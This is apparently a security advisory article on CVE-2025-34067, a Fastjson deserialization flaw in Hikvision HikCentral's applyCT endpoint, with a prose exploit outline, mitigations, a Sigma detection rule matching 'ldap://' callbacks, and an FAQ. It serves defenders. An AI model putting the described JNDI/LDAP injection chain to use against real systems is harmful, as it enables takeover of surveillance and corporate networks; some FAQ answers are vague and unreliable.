What is the HIKVISION ApplyCT Vulnerability and How Does it Impact Surveillance Devices?

Table of Contents

• At‑a‑Glance Vulnerability Table
• Timeline
• Technical Deep Dive
• Real‑World Impact Scenarios
• Mitigation Guidance
• Detection Rules (Sample Sigma Snippet)
• Lessons for Security Teams
• Key Takeaways
•  Frequently Asked Questions (FAQs)

A newly disclosed flaw in HIKVISION’s HikCentral Integrated Security Management Platform allows unauthenticated remote code execution (RCE) through the /bic/ssoService/v1/applyCT endpoint. Tracked as CVE‑2025‑34067 (CVSS 10.0), the bug stems from unsafe deserialization in an outdated copy of the Fastjson library. Millions of IP cameras, DVRs, and NVRs centrally managed by HikCentral could be taken over in a single network request.

At‑a‑Glance Vulnerability Table

Timeline

Technical Deep Dive

1. Endpoint — /bic/ssoService/v1/applyCT receives JSON payloads during single‑sign‑on.

2. Vulnerable Library — Uses Fastjson 1.2.x with auto‑type enabled.

   
   

3. Exploit Chain

   • Attacker sends malicious JSON specifying an LDAP URL in @type.

   • Fastjson loads attacker‑controlled Java class via JNDI.

   • Class executes arbitrary commands under HikCentral service account.

Because authentication is checked after deserialization, the attacker does not need valid credentials. Compromise of the Windows or Linux server hosting HikCentral grants lateral movement into the video network and possibly the corporate LAN.

Real‑World Impact Scenarios

• City Surveillance Hubs — RCE could let attackers disable or loop CCTV feeds during physical intrusions.

• Retail Chains — PoS network may share VLANs with NVRs; an adversary could pivot to payment systems.

• Critical Infrastructure — Utilities using HikCentral for perimeter monitoring risk OT crossover attacks.

Mitigation Guidance

1. Upgrade Immediately — Hikvision firmware & HikCentral patch 2.5.5 replace Fastjson with Jackson and add strict deserialization whitelists.

2. Block Endpoint — If you cannot patch, block or rewrite traffic to /bic/ssoService/ on reverse proxies.

3. Isolate Video Networks — Place cameras/NVRs on separate VLANs with no direct internet access.

4. Monitor for IOCs

   • Outbound LDAP/S ldap:// or rmi:// calls from HikCentral servers

   • Unexpected PowerShell/Bash processes spawned by Java 

Detection Rules (Sample Sigma Snippet)

title: Hikvision ApplyCT Fastjson Exploit
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4688
    NewProcessName|contains: "java.exe"
    CommandLine|contains|all:
      - "applyCT"
      - "ldap://"
  condition: selection
level: critical

Lessons for Security Teams

• Third‑Party Libraries Matter — Outdated Fastjson has plagued Java apps for years; SBOM and routine library scans would have flagged risk early.

• Zero‑Trust for Cameras — Treat video systems like untrusted IoT. Use MFA on management consoles and segment from IT assets.

• Patch Windows Hosts — Many HikCentral servers still run 2012 R2; combine this flaw with unpatched OS bugs and attackers get SYSTEM privileges fast.

Conclusion

CVE‑2025‑34067 is a stark reminder that IoT and security‑camera ecosystems can become enterprise footholds. Any organisation running HikCentral should patch or isolate systems now. With public PoC exploits circulating, defenders have a narrow window to get ahead of opportunistic botnets and targeted attackers.

Stay updated through vendor advisories and threat‑intel feeds, and incorporate these lessons into your broader vulnerability‑management and network‑segmentation strategies.

FAQs 

What is the HIKVISION ApplyCT vulnerability?

The ApplyCT vulnerability is a critical flaw in the HikCentral platform allowing unauthenticated remote code execution.

What is the CVE ID assigned to the Hikvision vulnerability?

It is CVE-2025-34067, rated with a maximum CVSS score of 10.0.

What does CVSS 10.0 mean for this vulnerability?

A CVSS score of 10.0 indicates the highest severity, meaning full compromise is possible without user interaction.

What platform is affected by this flaw?

The vulnerability affects Hikvision's HikCentral Integrated Security Management Platform, specifically the applyCT component.

What is Fastjson and how is it involved?

Fastjson is a Java library used for JSON processing. An outdated and vulnerable version is used in applyCT, leading to this RCE.

Can this vulnerability be exploited remotely?

Yes, it allows remote code execution without authentication.

Does this vulnerability require user interaction?

No, attackers can exploit the flaw without needing any user action.

How many devices are potentially affected?

Millions of surveillance devices globally could be affected by this flaw.

Who discovered the Hikvision vulnerability?

It was disclosed by security researchers analyzing the HikCentral platform.

What can attackers do if they exploit this flaw?

They can execute arbitrary code, control devices, implant backdoors, or steal data.

Is this vulnerability already being exploited?

As of now, there is no confirmed active exploitation, but the risk is considered high.

What should Hikvision users do immediately?

They should check for and apply the latest firmware or security patch from Hikvision.

Is there a patch available?

Hikvision is expected to release or has already released a security patch. Users should check the vendor website.

Is the vulnerability public?

Yes, the CVE details and nature of the exploit are publicly disclosed.

How can organizations detect exploitation?

They can monitor for abnormal access logs, unknown remote connections, or new processes.

Can traditional antivirus software block this?

Not reliably. This is a software logic flaw, not a known malware signature.

Why is IoT security critical in this context?

IoT devices like surveillance cameras are often overlooked but hold critical data and access paths.

What are the risks of not patching?

Unpatched systems may be hijacked for spying, network pivoting, or DDoS botnets.

Is this a zero-day vulnerability?

It is considered a zero-day until a patch is widely deployed, though it is now disclosed.

What makes this vulnerability unique?

Its ease of exploitation without authentication and its presence in widely deployed systems.

What is the role of applyCT in HikCentral?

It’s a component responsible for configuration and control tasks in HikCentral.

What steps can system administrators take?

Audit devices, restrict external access, apply patches, and monitor network behavior.

Is Fastjson widely used?

Yes, and this incident highlights why keeping third-party libraries updated is essential.

Can this be mitigated without patching?

Temporary workarounds like restricting access or disabling exposed services can reduce risk.

Are government entities at risk?

Yes, any organization using Hikvision surveillance systems could be affected.

What industries are most impacted?

Public sector, law enforcement, transportation, and critical infrastructure often use Hikvision products.

Does this affect NVR or DVR systems?

Potentially, if they run affected components or integrate with HikCentral.

Can firewalls prevent exploitation?

They can help if configured to block unnecessary external access, but are not foolproof.

How can I verify if my system is vulnerable?

Check the HikCentral version, and compare it against the CVE advisory from Hikvision.

Is Hikvision cooperating with researchers?

Hikvision typically works with security experts to patch known issues after responsible disclosure.

Will this vulnerability appear in future pentesting reports?

Yes, it’s a major vulnerability and will likely be flagged in automated scans or red team audits.